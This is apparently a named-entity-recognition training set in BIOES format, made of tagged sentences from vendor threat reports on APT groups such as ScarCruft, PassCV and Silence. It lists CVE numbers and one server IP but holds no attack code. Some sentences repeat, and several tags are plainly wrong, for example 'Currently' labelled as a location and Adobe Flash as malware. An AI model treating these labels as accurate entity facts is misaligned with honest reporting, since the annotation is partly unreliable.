E-LOC +region O +and O +unveiled O +ongoing O +targeted B-ACT +attacks E-ACT +in O +multiple O +regions O +. 
O + +The O +attackers O +try O +to O +lure O +targets O +through O +spear B-ACT +phishing E-ACT +emails S-TOOL +that O +include O +compressed O +executables O +. O + +We O +found O +that O +the O +group O +behind O +this O +campaign O +targeted O +mainly O +industrial S-IDTY +, O +engineering S-IDTY +and O +manufacturing B-IDTY +organizations E-IDTY +in O +more O +than O +30 O +countries O +. O + +Using O +the O +Kaspersky B-SECTEAM +Security I-SECTEAM +Network E-SECTEAM +( O +KSN S-SECTEAM +) O +and O +artifacts O +from O +malware O +files O +and O +attack O +sites O +, O +we O +were O +able O +to O +trace O +the O +attacks O +back O +to O +March B-TIME +2015 E-TIME +. O + +Operation B-ACT +Ghoul E-ACT +is O +one O +of O +the O +many O +attacks O +in O +the O +wild O +targeting O +industrial S-IDTY +, O +manufacturing S-IDTY +and O +engineering B-IDTY +organizations E-IDTY +, O +Kaspersky B-SECTEAM +Lab E-SECTEAM +recommends O +users O +to O +be O +extra O +cautious O +while O +checking O +and O +opening O +emails B-ACT +and I-ACT +attachments E-ACT +. O + +The O +main O +point O +that O +sets O +Operation B-ACT +Groundbait E-ACT +apart O +from O +the O +other O +attacks O +is O +that O +it O +has O +mostly O +been O +targeting O +anti-government B-IDTY +separatists E-IDTY +in O +the O +self-declared O +Donetsk O +and O +Luhansk O +People O +'s O +Republics O +. O + +The O +attacks O +appear O +to O +be O +geopolitically O +motivated O +and O +target O +high B-IDTY +profile I-IDTY +organizations E-IDTY +. O + +The O +objective O +of O +the O +attacks O +is O +clearly O +espionage O +– O +they O +involve O +gaining O +access O +to O +top O +legislative O +, O +executive O +and O +judicial O +bodies O +around O +the O +world O +. 
O + +The O +attackers O +have O +targeted O +a O +large O +number O +of O +organizations O +globally O +since O +early O +2017 S-TIME +, O +with O +the O +main O +focus O +on O +the O +Middle B-LOC +East E-LOC +and O +North B-LOC +Africa E-LOC +( O +MENA S-LOC +) O +, O +especially O +Palestine O +. O + +The O +attacks O +were O +initially O +discovered O +while O +investigating O +a O +phishing B-ACT +attack E-ACT +that O +targeted O +political S-IDTY +figures O +in O +the O +MENA S-LOC +region O +. O + +Like O +BlackEnergy S-MAL +( O +a.k.a. O +Sandworm S-APT +, O +Quedagh S-APT +) O +, O +Potao S-MAL +is O +an O +example O +of O +targeted O +espionage O +( O +APT O +) O +malware O +detected O +mostly O +in O +Ukraine S-LOC +and O +a O +number O +of O +other O +CIS O +countries O +, O +including O +Russia S-LOC +, O +Georgia S-LOC +and O +Belarus S-LOC +. O + +The O +main O +reason O +for O +the O +increase O +in O +Potao S-MAL +detections O +in O +2014 S-TIME +and O +2015 S-TIME +were O +infections O +through O +USB O +drives O +. O + +The O +first O +Potao B-ACT +campaign E-ACT +that O +we O +examined O +took O +place O +in O +August B-TIME +2011 E-TIME +. O + +In O +March B-TIME +2014 E-TIME +, O +the O +gang O +behind O +Potao S-MAL +started O +using O +a O +new O +infection B-MAL +vector E-MAL +. O + +Since O +March B-TIME +2015 E-TIME +, O +ESET S-SECTEAM +has O +detected O +Potao S-MAL +binaries O +at O +several O +high-value O +Ukrainian S-LOC +targets O +that O +include O +government S-IDTY +and O +military B-IDTY +entities E-IDTY +and O +one O +of O +the O +major O +Ukrainian O +news B-IDTY +agencies E-IDTY +. O + +As O +confirmation O +that O +the O +malware O +writers O +are O +still O +very O +active O +even O +at O +the O +time O +of O +this O +writing O +, O +ESET S-SECTEAM +detected O +a O +new O +Potao B-MAL +sample E-MAL +compiled O +on O +July B-TIME +20 E-TIME +, O +2015 S-TIME +. 
O + +In O +the O +previous O +pages O +we O +have O +presented O +our O +findings O +based O +on O +ESET S-SECTEAM +detection O +telemetry O +and O +our O +analysis O +of O +Win32/Potao S-MAL +and O +Win32/FakeTC B-MAL +samples E-MAL +. O + +Potao S-MAL +is O +another O +example O +of O +targeted O +espionage O +malware O +, O +a O +so-called O +APT O +, O +to O +use O +the O +popular O +buzzword O +, O +although O +technically O +the O +malware S-MAL +is O +not O +particularly O +advanced O +or O +sophisticated O +. O + +Examples O +of O +notable O +Potao S-MAL +dissemination O +techniques O +, O +some O +of O +which O +were O +previously O +unseen O +, O +or O +at O +least O +relatively O +uncommon O +, O +include O +the O +use O +of O +highly-targeted O +spear-phishing S-ACT +SMS O +messages O +to O +drive O +potential O +victims O +to O +malware O +download O +sites O +and O +USB O +worm O +functionality O +that O +tricked O +the O +user O +into O +' O +willingly O +' O +executing O +the O +Trojan S-MAL +. O + +The O +PassCV B-APT +group E-APT +continues O +to O +be O +one O +of O +the O +most O +successful O +and O +active O +threat O +groups O +that O +leverage O +a O +wide O +array O +of O +stolen O +Authenticode-signing O +certificates O +. O + +The O +PassCV B-APT +group E-APT +typically O +utilized O +publicly O +available O +RATs S-MAL +in O +addition O +to O +some O +custom O +code O +, O +which O +ultimately O +provided O +backdoor O +functionality O +to O +affected O +systems O +via O +phony O +resumes O +and O +curriculum O +vitae O +( O +CVs O +) O +. O + +he O +PassCV S-APT +group O +typically O +utilized O +publicly O +available O +RATs S-MAL +in O +addition O +to O +some O +custom O +code O +, O +which O +ultimately O +provided O +backdoor O +functionality O +to O +affected O +systems O +via O +phony O +resumes O +and O +curriculum O +vitae O +( O +CVs O +) O +. 
O + +PassCV S-APT +continues O +to O +maintain O +a O +heavy O +reliance O +on O +obfuscated O +and O +signed O +versions O +of O +older O +RATs S-MAL +like O +ZxShell S-MAL +and O +Ghost B-MAL +RAT E-MAL +, O +which O +have O +remained O +a O +favorite O +of O +the O +wider O +Chinese O +criminal O +community O +since O +their O +initial O +public O +release O +. O + +SPEAR S-SECTEAM +identified O +recent O +PassCV B-MAL +samples E-MAL +which O +implemented O +another O +commercial O +off-the-shelf O +( O +COTS O +) O +RAT S-MAL +called O +Netwire S-MAL +. O + +SPEAR S-SECTEAM +identified O +recent O +PassCV B-MAL +samples E-MAL +which O +implemented O +another O +commercial O +off-the-shelf O +( O +COTS O +) O +RAT S-MAL +called O +Netwire S-MAL +. O + +The O +first O +new O +connection O +SPEAR S-SECTEAM +identified O +was O +derived O +from O +an O +email S-TOOL +address O +listed O +in O +Blue O +Coat O +Systems' O +original O +report O +on O +PassCV S-APT +. O + +Syncopate O +is O +a O +well-known O +Russian O +company S-IDTY +that O +is O +best O +known O +as O +the O +developer O +and O +operator O +of O +the O +' O +GameNet O +' O +platform O +. O + +The O +PassCV S-APT +group O +continues O +to O +be O +extremely O +effective O +in O +compromising O +both O +small O +and O +large O +game B-IDTY +companies E-IDTY +and O +surreptitiously O +using O +their O +code-signing O +certificates O +to O +infect O +an O +even O +larger O +swath O +of O +organizations O +. O + +Since O +the O +last O +report O +, O +PassCV S-APT +has O +significantly O +expanded O +its O +targets O +to O +include O +victims O +in O +the O +United B-LOC +States E-LOC +, O +Taiwan S-LOC +, O +China S-LOC +and O +Russia S-LOC +. 
O + +Based O +on O +data O +collected O +from O +Palo B-SECTEAM +Alto I-SECTEAM +Networks I-SECTEAM +AutoFocus E-SECTEAM +threat O +intelligence O +, O +we O +discovered O +continued O +operations O +of O +activity O +very O +similar O +to O +the O +Roaming B-ACT +Tiger I-ACT +attack I-ACT +campaign E-ACT +that O +began O +in O +the O +August S-TIME +2015 S-TIME +timeframe O +, O +with O +a O +concentration O +of O +attacks O +in O +late O +October S-TIME +and O +continuing O +into O +December O +. O + +The O +files S-FILE +exploit S-VULNAME +the O +well-known O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +, O +CVE-2012-0158 S-VULID +, O +to O +execute O +malicious O +code O +in O +order O +to O +take O +control O +of O +the O +targeted O +systems O +. O + +BBSRAT S-MAL +is O +typically O +packaged O +within O +a O +portable B-ACT +executable I-ACT +file E-ACT +, O +although O +in O +a O +few O +of O +the O +observed O +instances O +, O +a O +raw O +DLL S-TOOL +was O +discovered O +to O +contain O +BBSRAT S-MAL +. O + +WildFire S-SECTEAM +properly O +classifies O +BBSRAT B-MAL +malware I-MAL +samples E-MAL +as O +malicious O +. O + +This O +week O +we O +will O +discuss O +another O +Chinese S-LOC +nexus O +adversary O +we O +call O +Samurai O +Panda O +. O + +Samurai B-APT +Panda E-APT +is O +interesting O +in O +that O +their O +target O +selection O +tends O +to O +focus O +on O +Asia B-LOC +Pacific E-LOC +victims O +in O +Japan S-LOC +, O +the O +Republic B-LOC +of I-LOC +Korea E-LOC +, O +and O +other O +democratic O +Asian S-LOC +victims O +. O + +Next O +, O +in O +an O +effort O +to O +demonstrate O +it O +wasn't O +relegated O +to O +China O +, O +CrowdStrike S-SECTEAM +exposed O +Clever O +Kitten O +, O +an O +actor O +we O +track O +out O +of O +Iran S-LOC +who O +leverages O +some O +very O +distinct O +TTPs O +when O +viewed O +next O +to O +a O +more O +visible O +adversary O +. 
O + +Next O +, O +in O +an O +effort O +to O +demonstrate O +it O +wasn't O +relegated O +to O +China O +, O +we O +exposed O +Clever O +Kitten O +, O +an O +actor O +we O +track O +out O +of O +Iran S-LOC +who O +leverages O +some O +very O +distinct O +TTPs O +when O +viewed O +next O +to O +a O +more O +visible O +adversary O +. O + +Beginning O +in O +2009 S-TIME +, O +we've O +observed O +this O +actor O +conduct O +more O +than O +40 O +unique O +campaigns S-ACT +that O +we've O +identified O +in O +the O +malware O +configurations' O +campaign O +codes O +. O + +These O +codes O +are O +often O +leveraged O +in O +the O +malware O +used O +by O +coordinated O +targeted O +attackers O +to O +differentiate O +victims O +that O +were O +successfully O +compromised O +from O +different O +target O +sets O +. O + +When O +conducting O +programmatic O +espionage B-ACT +activity E-ACT +, O +it O +can O +presumably O +become O +quite O +confusing O +if O +the O +attacker O +targets O +a O +heavy B-IDTY +industry I-IDTY +company E-IDTY +, O +an O +avionics O +program O +, O +and O +seven O +other O +unique O +targets O +as O +to O +which O +infected O +host O +you O +will O +collect O +what O +information O +from O +. O + +These O +rules O +detect O +the O +malware O +" O +beaconing S-MAL +" O +to O +the O +command-and-control B-MAL +server E-MAL +, O +the O +initial O +malware O +check-in O +, O +and O +an O +attempt O +to O +download O +a O +backdoor O +module O +. O + +Earlier O +this O +month O +, O +Securelist S-SECTEAM +'s O +technology O +caught O +another O +zero-day S-VULNAME +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploits O +deployed O +in O +targeted B-ACT +attacks E-ACT +. O + +Securelist S-APT +believe O +the O +attacks O +are O +launched O +by O +an O +APT O +Group O +we O +track O +under O +the O +codename O +" O +ScarCruft S-APT +" O +. 
O + +ScarCruft S-APT +is O +a O +relatively O +new O +APT O +group O +; O +victims O +have O +been O +observed O +in O +Russia S-LOC +, O +Nepal S-LOC +, O +South B-LOC +Korea E-LOC +, O +China S-LOC +, O +India S-LOC +, O +Kuwait S-LOC +and O +Romania S-LOC +. O + +ScarCruft S-APT +has O +several O +ongoing O +operations O +, O +utilizing O +multiple O +exploits O +— O +two O +for O +Adobe B-MAL +Flash E-MAL +and O +one O +for O +Microsoft B-MAL +Internet I-MAL +Explorer E-MAL +. O + +ScarCruft S-APT +is O +a O +relatively O +new O +APT O +group O +; O +victims O +have O +been O +observed O +in O +Russia S-LOC +, O +Nepal S-LOC +, O +South B-LOC +Korea E-LOC +, O +China S-LOC +, O +India S-LOC +, O +Kuwait S-LOC +and O +Romania S-LOC +. O + +Operation B-ACT +Daybreak E-ACT +appears O +to O +have O +been O +launched O +by O +ScarCruft O +in O +March B-TIME +2016 E-TIME +and O +employs O +a O +previously O +unknown O +( O +0-day S-VULNAME +) O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploit S-VULNAME +. O + +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploit S-VULNAME +. O + +It O +is O +also O +possible O +that O +ScarCruft S-APT +deployed O +another O +zero B-VULNAME +day E-VULNAME +exploit S-VULNAME +, O +CVE-2016-0147 S-VULID +, O +which O +was O +patched O +in O +April O +. O + +Operation B-ACT +Erebus E-ACT +leverages O +another O +Flash B-TOOL +Player E-TOOL +exploit S-VULNAME +( O +CVE-2016-4117 S-VULID +) O +through O +the O +use O +of O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +ScarCruft S-APT +'s O +Operation B-ACT +Erebus E-ACT +leverages O +another O +Flash B-TOOL +Player E-TOOL +exploit S-VULNAME +( O +CVE-2016-4117 S-VULID +) O +through O +the O +use O +of O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +Nevertheless O +, O +resourceful O +threat O +actors O +such O +as O +ScarCruft S-APT +will O +probably O +continue O +to O +deploy O +zero-day S-VULNAME +exploits O +against O +their O +high O +profile O +targets O +. 
O + +After O +publishing O +our O +initial O +series O +of O +blogposts O +back O +in O +2016 S-TIME +, O +Kaspersky S-SECTEAM +have O +continued O +to O +track O +the O +ScarCruft S-APT +threat O +actor O +. O + +After O +publishing O +our O +initial O +series O +of O +blogposts O +back O +in O +2016 S-TIME +, O +we O +have O +continued O +to O +track O +the O +ScarCruft O +threat O +actor O +. O + +ScarCruft S-APT +is O +a O +Korean-speaking S-LOC +and O +allegedly O +state-sponsored O +threat O +actor O +that O +usually O +targets O +organizations O +and O +companies O +with O +links O +to O +the O +Korean B-LOC +peninsula E-LOC +. O + +The O +ScarCruft B-APT +group E-APT +uses O +common O +malware O +delivery O +techniques O +such O +as O +spear B-ACT +phishing E-ACT +and O +Strategic B-ACT +Web I-ACT +Compromises E-ACT +( O +SWC S-ACT +) O +. O + +ScarCruft S-APT +is O +a O +Korean-speaking O +and O +allegedly O +state-sponsored O +threat O +actor O +that O +usually O +targets O +organizations O +and O +companies O +with O +links O +to O +the O +Korean S-LOC +peninsula O +. O + +ScarCruft S-APT +uses O +a O +multi-stage O +binary B-ACT +infection I-ACT +scheme E-ACT +. O + +One O +of O +the O +most O +notable O +functions O +of O +the O +initial O +dropper S-MAL +is O +to O +bypass O +Windows S-OS +UAC O +( O +User O +Account O +Control O +) O +in O +order O +to O +execute O +the O +next O +payload O +with O +higher O +privileges O +. O + +This O +malware O +uses O +the O +public O +privilege O +escalation O +exploit S-VULNAME +code O +CVE-2018-8120 S-VULID +or O +UACME S-MAL +which O +is O +normally O +used O +by O +legitimate O +red O +teams O +. O + +Afterwards O +, O +the O +installer O +malware O +creates O +a O +downloader O +and O +a O +configuration O +file O +from O +its O +resource O +and O +executes O +it O +. 
O + +The O +downloader S-MAL +malware S-MAL +uses O +the O +configuration O +file O +and O +connects O +to O +the O +C2 S-TOOL +server O +to O +fetch O +the O +next O +payload O +. O + +The O +ScarCruft S-APT +group O +keeps O +expanding O +its O +Exfiltration S-ACT +targets O +to O +steal O +further O +information O +from O +infected O +hosts O +and O +continues O +to O +create O +tools O +for O +additional O +data O +Exfiltration S-ACT +. O + +We O +also O +discovered O +an O +interesting O +piece O +of O +rare O +malware S-MAL +created O +by O +this O +threat O +actor O +– O +a O +Bluetooth B-FILE +device I-FILE +harvester E-FILE +. O + +We O +believe O +they O +may O +have O +some O +links O +to O +North O +Korea O +, O +which O +may O +explain O +why O +ScarCruft O +decided O +to O +closely O +monitor O +them O +. O + +ScarCruft O +also O +attacked O +a O +diplomatic B-IDTY +agency E-IDTY +in O +Hong S-LOC +Kong S-LOC +, O +and O +another O +diplomatic B-IDTY +agency E-IDTY +in O +North B-LOC +Korea E-LOC +. O + +It O +appears O +ScarCruft S-APT +is O +primarily O +targeting O +intelligence S-IDTY +for O +political S-IDTY +and O +diplomatic S-IDTY +purposes O +. O + +ScarCruft S-APT +infected O +this O +victim O +on O +September B-TIME +21 E-TIME +, O +2018 S-TIME +. O + +But O +before O +the O +ScarCruft S-APT +infection O +, O +however O +, O +another O +APT O +group O +also O +targeted O +this O +victim O +with O +the O +host O +being O +infected O +with O +GreezeBackdoor O +on O +March B-TIME +26 E-TIME +, O +2018 S-TIME +. O + +ScarCruft S-APT +has O +a O +keen O +interest O +in O +North B-LOC +Korean E-LOC +affairs O +, O +attacking O +those O +in O +the O +business B-IDTY +sector E-IDTY +who O +may O +have O +any O +connection O +to O +North B-LOC +Korea E-LOC +, O +as O +well O +as O +diplomatic B-IDTY +agencies E-IDTY +around O +the O +globe O +. 
O + +Earlier O +this O +month O +, O +we O +caught O +another O +zero-day S-VULNAME +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploits O +deployed O +in O +targeted B-ACT +attacks E-ACT +. O + +ScarCruft S-APT +is O +a O +relatively O +new O +APT O +group O +; O +victims O +have O +been O +observed O +in O +several O +countries O +, O +including O +Russia S-LOC +, O +Nepal S-LOC +, O +South S-LOC +Korea S-LOC +, O +China S-LOC +, O +India S-LOC +, O +Kuwait S-LOC +and O +Romania S-LOC +. O + +Currently S-LOC +, O +the O +group O +is O +engaged O +in O +two O +major O +operations O +: O +Operation B-ACT +Daybreak E-ACT +and O +Operation B-ACT +Erebus E-ACT +. O + +The O +other O +one O +, O +ScarCruft O +'s O +Operation B-ACT +Erebus E-ACT +employs O +an O +older O +exploit S-VULNAME +, O +for O +CVE-2016-4117 S-VULID +and O +leverages O +watering B-ACT +holes E-ACT +. O + +The O +other O +one O +, O +" O +Operation B-ACT +Erebus E-ACT +" O +employs O +an O +older O +exploit S-VULNAME +, O +for O +CVE-2016-4117 S-VULID +and O +leverages O +watering B-ACT +holes E-ACT +. O + +We O +will O +publish O +more O +details O +about O +the O +attack O +once O +Adobe O +patches O +the O +vulnerability O +, O +which O +should O +be O +on O +June B-TIME +16 E-TIME +. O + +The O +ScarCruft O +APT O +gang O +has O +made O +use O +of O +a O +Flash S-TOOL +zero B-VULNAME +day E-VULNAME +patched O +Thursday O +by O +Adobe O +to O +attack O +more O +than O +two O +dozen O +high-profile O +targets O +in O +Russia S-LOC +and O +Asia S-LOC +primarily O +. O + +Adobe O +on O +Thursday O +patched O +a O +zero-day S-VULNAME +vulnerability O +in O +Flash S-TOOL +Player O +that O +has O +been O +used O +in O +targeted B-ACT +attacks E-ACT +carried O +out O +by O +a O +new O +APT O +group O +operating O +primarily O +against O +high-profile O +victims O +in O +Russia S-LOC +and O +Asia S-LOC +. 
O + +Researchers O +at O +Kaspersky B-SECTEAM +Lab E-SECTEAM +privately O +disclosed O +the O +flaw O +to O +Adobe O +after O +exploits O +against O +the O +zero-day S-VULNAME +were O +used O +in O +March S-TIME +by O +the O +ScarCruft O +APT O +gang O +in O +what O +Kaspersky B-SECTEAM +Lab E-SECTEAM +is O +calling O +Operation B-ACT +Daybreak E-ACT +. O + +Kaspersky S-SECTEAM +speculates O +that O +ScarCruft S-APT +could O +also O +be O +behind O +another O +zero-day S-VULNAME +, O +CVE-2016-0147 S-VULID +, O +a O +vulnerability O +in O +Microsoft S-IDTY +XML S-TOOL +Core O +Services O +that O +was O +patched O +in O +April S-TIME +. O + +attacks O +start O +with O +spear-phishing S-ACT +emails S-TOOL +that O +include O +a O +link O +to O +a O +website O +hosting O +an O +exploit S-VULNAME +kit O +associated O +with O +ScarCruft S-APT +and O +used O +in O +other O +attacks O +. O + +Another O +set O +of O +attacks O +called O +Operation B-ACT +Erebus E-ACT +leverages O +another O +flash S-TOOL +exploit S-VULNAME +, O +CVE-2016-4117 S-VULID +, O +and O +relies O +on O +watering B-ACT +hole I-ACT +attacks E-ACT +as O +a O +means O +of O +propagation O +. O + +Thursday O +'s O +Flash S-TOOL +Player O +update O +patched O +36 O +vulnerabilities O +in O +total O +including O +the O +zero B-VULNAME +day E-VULNAME +CVE-2016-4171 S-VULID +. O + +The O +ongoing O +operation O +likely O +began O +as O +early O +as O +January B-TIME +2017 E-TIME +and O +has O +continued O +through O +the O +first O +quarter O +of O +2019 S-TIME +. O + +Cisco B-SECTEAM +Talos E-SECTEAM +assess O +with O +high O +confidence O +that O +these O +operations O +are O +distinctly O +different O +and O +independent O +from O +the O +operations O +performed O +by O +DNSpionage S-ACT +, O +which O +we O +reported O +on O +in O +November B-TIME +2018 E-TIME +. 
O + +We O +assess O +with O +high O +confidence O +that O +these O +operations O +are O +distinctly O +different O +and O +independent O +from O +the O +operations O +performed O +by O +DNSpionage S-ACT +, O +which O +we O +reported O +on O +in O +November B-TIME +2018 E-TIME +. O + +The O +common O +use O +of O +the O +Enfal B-MAL +Trojan E-MAL +suggests O +that O +Shadow O +Network O +may O +be O +exchanging O +tools O +and O +techniques O +. O + +While B-APT +Silence E-APT +had O +previously O +targeted O +Russian S-LOC +banks S-IDTY +, O +Group-IB S-SECTEAM +experts O +also O +have O +discovered O +evidence O +of O +the O +group O +'s O +activity O +in O +more O +than O +25 O +countries O +worldwide O +. O + +In O +August B-TIME +2017 E-TIME +, O +the O +National B-IDTY +Bank E-IDTY +of O +Ukraine S-LOC +warned O +state-owned O +and O +private B-IDTY +banks E-IDTY +across O +the O +country O +about O +a O +large-scale O +phishing B-ACT +attack E-ACT +. O + +The O +threat O +actor O +used O +an O +exploit S-VULNAME +from O +the O +arsenal O +of O +the O +state-sponsored O +hacker O +group O +APT28 S-APT +. O + +The O +new O +threat O +actor O +group O +was O +eventually O +named O +Silence O +. O + +Silence O +is O +a O +group O +of O +Russian-speaking S-LOC +hackers O +, O +based O +on O +their O +commands O +language O +, O +the O +location O +of O +infrastructure O +they O +used O +, O +and O +the O +geography O +of O +their O +targets O +( O +Russia S-LOC +, O +Ukraine S-LOC +, O +Belarus S-LOC +, O +Azerbaijan S-LOC +, O +Poland S-LOC +, O +and O +Kazakhstan S-LOC +) O +. O + +Although O +Silence O +'s O +phishing B-ACT +emails S-TOOL +were O +also O +sent O +to O +bank B-IDTY +employees E-IDTY +in O +Central B-LOC +and I-LOC +Western I-LOC +Europe E-LOC +, O +Africa S-LOC +, O +and O +Asia S-LOC +) O +. O + +Silence O +also O +used O +Russian-language S-LOC +web B-MAL +hosting I-MAL +services E-MAL +. 
O + +Financially O +motivated O +APT O +groups O +which O +focus O +efforts O +on O +targeted B-ACT +attacks E-ACT +on O +the O +financial B-IDTY +sector E-IDTY +such O +as O +— O +Anunak O +, O +Corkow S-MAL +, O +Buhtrap O +— O +usually O +managed O +botnets O +using O +developed O +or O +modified O +banking S-IDTY +Trojans O +. O + +They O +tried O +new O +techniques O +to O +steal O +from O +banking O +systems O +, O +including O +AWS O +CBR O +( O +the O +Russian S-LOC +Central B-IDTY +Bank I-IDTY +'s I-IDTY +Automated I-IDTY +Workstation I-IDTY +Client E-IDTY +) O +, O +ATMs S-IDTY +, O +and O +card O +processing O +. O + +Group-IB S-SECTEAM +researchers O +were O +tracking O +Silence O +throughout O +this O +period O +and O +conducting O +response O +following O +incidents O +in O +the O +financial B-IDTY +sector E-IDTY +. O + +Group-IB S-SECTEAM +detected O +the O +first O +incidents O +relating O +to O +Silence O +in O +June B-TIME +2016 E-TIME +. O + +One O +of O +Silence O +'s O +first O +targets O +was O +a O +Russian S-LOC +bank S-IDTY +, O +when O +they O +tried O +to O +attack O +AWS O +CBR O +. O + +They O +are O +selective O +in O +their O +attacks O +and O +wait O +for O +about O +three O +months O +between O +incidents O +, O +which O +is O +approximately O +three O +times O +longer O +than O +other O +financially O +motivated O +APT O +groups O +, O +like O +MoneyTaker O +, O +Anunak O +( O +Carbanak O +) O +, O +Buhtrap O +or O +Cobalt O +. O + +Silence O +try O +to O +apply O +new O +techniques O +and O +ACTs O +of O +stealing O +from O +various O +banking O +systems O +, O +including O +AWS O +CBR O +, O +ATMs O +, O +and O +card O +processing O +. O + +Silence O +'s O +successful O +attacks O +currently O +have O +been O +limited O +to O +the O +CIS O +and O +Eastern O +European O +countries O +. 
O + +He O +is O +responsible O +for O +developing O +tools O +for O +conducting O +attacks O +and O +is O +also O +able O +to O +modify O +complex O +exploits O +and O +third O +party O +software O +. O + +Silence O +'s O +main O +targets O +are O +located O +in O +Russia S-LOC +, O +Ukraine S-LOC +, O +Belarus S-LOC +, O +Azerbaijan S-LOC +, O +Poland S-LOC +, O +and O +Kazakhstan S-LOC +. O + +However O +, O +some O +phishing B-ACT +emails S-TOOL +were O +sent O +to O +bank B-IDTY +employees E-IDTY +in O +more O +than O +25 O +countries O +of O +Central S-LOC +and O +Western S-LOC +Europe S-LOC +, O +Africa S-LOC +and O +Asia S-LOC +including O +: O +Kyrgyzstan S-LOC +, O +Armenia S-LOC +, O +Georgia S-LOC +, O +Serbia S-LOC +, O +Germany S-LOC +, O +Latvia S-LOC +, O +Czech B-LOC +Republic E-LOC +, O +Romania S-LOC +, O +Kenya S-LOC +, O +Israel S-LOC +, O +Cyprus S-LOC +, O +Greece S-LOC +, O +Turkey S-LOC +, O +Taiwan S-LOC +, O +Malaysia S-LOC +, O +Switzerland S-LOC +, O +Vietnam S-LOC +, O +Austria S-LOC +, O +Uzbekistan S-LOC +, O +Great B-LOC +Britain E-LOC +, O +Hong B-LOC +Kong E-LOC +, O +and O +others O +. O + +In O +the O +same O +year O +, O +they O +conducted O +DDoS B-ACT +attacks E-ACT +using O +the O +Perl B-MAL +IRC I-MAL +bot E-MAL +and O +public B-MAL +IRC I-MAL +chats E-MAL +to O +control O +Trojans O +. O + +In O +the O +same O +year O +, O +Silence O +conducted O +DDoS B-ACT +attacks E-ACT +using O +the O +Perl B-MAL +IRC I-MAL +bot E-MAL +and O +public B-MAL +IRC I-MAL +chats E-MAL +to O +control O +Trojans O +. O + +In O +two O +months O +, O +the O +group O +returned O +to O +their O +proven O +method O +and O +withdrew O +funds O +again O +through O +ATMs O +. O + +In O +September B-TIME +2017 E-TIME +, O +we O +discovered O +a O +new O +targeted B-ACT +attack E-ACT +on O +financial B-IDTY +institutions E-IDTY +. 
O + +In O +September B-TIME +2017 E-TIME +, O +we O +discovered O +Silence B-ACT +attack E-ACT +on O +financial B-IDTY +institutions E-IDTY +. O + +The O +infection O +vector O +is O +a O +spear-phishing S-ACT +email E-ACT +with O +a O +malicious O +attachment O +. O + +An O +interesting O +point O +in O +the O +Silence B-ACT +attack E-ACT +is O +that O +the O +cybercriminals O +had O +already O +compromised O +banking S-IDTY +infrastructure O +in O +order O +to O +send O +their O +spear-phishing S-ACT +emails S-TOOL +from O +the O +addresses O +of O +real O +bank B-IDTY +employees E-IDTY +and O +look O +as O +unsuspicious O +as O +possible O +to O +future O +victims O +. O + +The O +spear-phishing S-ACT +infection O +vector O +is O +still O +the O +most O +popular O +ACT O +to O +initiate O +targeted O +campaigns S-ACT +. O + +We O +conclude O +that O +the O +actor O +behind O +the O +attack O +is O +Silence O +group O +, O +a O +relatively O +new O +threat O +actor O +that's O +been O +operating O +since O +mid-2016 S-TIME +. O + +A O +preliminary O +analysis O +caught O +the O +attention O +of O +our O +Threat O +Analysis O +and O +Intelligence O +team O +as O +it O +yielded O +interesting O +data O +that O +, O +among O +other O +things O +, O +shows O +that O +Silence O +was O +targeting O +employees S-IDTY +from O +financial B-IDTY +entities E-IDTY +, O +specifically O +in O +the O +Russian B-LOC +Federation E-LOC +and O +the O +Republic B-LOC +of I-LOC +Belarus E-LOC +. O + +As O +shown O +above O +, O +the O +threat O +runs O +several O +native B-MAL +binaries E-MAL +to O +collect O +useful O +information O +for O +its O +recon O +phase O +. O + +The O +intelligence O +we O +have O +collected O +shows O +that O +Silence O +is O +part O +of O +a O +more O +extensive O +operation O +, O +still O +focused O +on O +financial B-IDTY +institutions E-IDTY +operating O +mainly O +on O +Russian O +territory O +. 
O + +These O +spearphishing S-ACT +attempts O +represent O +an O +evolution O +of O +Iranian O +actors O +based O +on O +their O +social B-ACT +engineering I-ACT +tactics E-ACT +and O +narrow O +targeting O +. O + +Based O +on O +file O +modification O +dates O +and O +timestamps O +of O +samples O +, O +it O +appears O +that O +the O +observed O +campaign O +was O +initiated O +in O +the O +middle O +of O +February B-TIME +2016 E-TIME +, O +with O +the O +infrastructure O +taken O +offline O +at O +the O +start O +of O +March S-TIME +. O + +While O +the O +Sima O +moniker O +could O +similarly O +originate O +from O +software O +labels O +, O +it O +is O +a O +common O +female O +Persian O +name O +and O +a O +Persian-language O +Word S-TOOL +for O +" O +visage O +" O +or O +" O +appearance O +" O +. O +Given O +its O +use O +in O +more O +advanced O +social B-IDTY +engineering I-IDTY +campaigns E-IDTY +against O +women B-IDTY +'s I-IDTY +rights I-IDTY +activists E-IDTY +, O +the O +label O +seem O +particularly O +apt O +. O + +Samples O +and O +resource O +names O +contained O +the O +family O +names O +of O +prominent O +Iranians S-IDTY +, O +and O +several O +of O +these O +individuals O +received O +the O +malware O +located O +in O +their O +respective O +folder O +. O + +The O +Sima S-APT +group O +also O +engaged O +in O +impersonation O +of O +Citizenship S-IDTY +and O +Immigration B-IDTY +Services E-IDTY +at O +the O +Department B-SECTEAM +of I-SECTEAM +Homeland I-SECTEAM +Security E-SECTEAM +, O +posing O +as O +a O +notice O +about O +the O +expiration O +of O +the O +recipient O +'s O +Permanent O +Residence O +status O +. 
O + +In O +another O +case O +, O +Sima S-APT +mirrored O +an O +announcement O +made O +about O +the O +broadcast O +of O +a O +television O +program O +on O +Iranian-American O +cultural O +affairs O +in O +order O +to O +impersonate O +the O +individual O +and O +engage O +in O +spearphishing S-ACT +within O +hours O +of O +the O +legitimate O +message O +. O + +The O +server O +used O +to O +host O +these O +malware O +samples O +was O +located O +on O +the O +German S-LOC +provider S-IDTY +Hetzner O +( O +148.251.55.114 O +) O +, O +within O +a O +small O +block O +of O +IP S-PROT +addresses O +that O +are O +registered O +with O +the O +customer O +ID O +" O +HOS-156205 O +" O +. O + +All O +the O +samples O +appear O +to O +be O +have O +been O +compiled O +between O +February B-TIME +29 E-TIME +and O +March B-TIME +1 I-TIME +2016 E-TIME +, O +shortly O +before O +our O +discovery O +, O +suggesting O +that O +, O +despite O +the O +known O +C&C S-TOOL +servers O +having O +quickly O +gone O +offline O +shortly O +after O +, O +this O +spree O +of O +attacks O +might O +be O +fresh O +and O +currently O +undergoing O +. O + +These O +archives O +provide O +further O +indication O +that O +those O +entities O +behind O +the O +campaigns 